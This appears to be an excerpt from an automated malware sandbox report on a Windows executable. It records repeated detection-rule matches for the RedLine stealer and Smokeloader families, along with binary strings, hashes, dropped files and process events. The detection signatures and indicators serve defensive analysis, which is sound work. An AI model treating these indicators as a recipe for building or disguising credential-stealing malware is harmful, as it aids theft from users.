                  Source: 00000000.00000000.345695495.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.313966134.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.352618407.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.319401695.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.318795705.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.302663434.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.309109018.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324683404.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.313496806.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.339850258.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.337744676.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.346524213.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.303421378.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.308709997.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.352027898.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324186328.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Binary is likely a compiled AutoIt script file
                  Source: file.exe, 00000000.00000003.397979346.0000000003B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: file.exe, 00000000.00000003.397181880.0000000003D3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: soft[1].0.drString found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x | S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.345695495.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.313966134.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.352618407.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.319401695.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.318795705.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.302663434.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.309109018.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324683404.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.313496806.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.339850258.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.337744676.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.346524213.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.303421378.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.308709997.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.352027898.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000000.324186328.0000000000739000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeCode function: 22_2_00007FF9A58D1D61
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeCode function: 22_2_00007FF9A58DA91D
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeCode function: 22_2_00007FF9A58D553E
                  Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMmail.exe, vs file.exe
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1] C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                  Source: Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
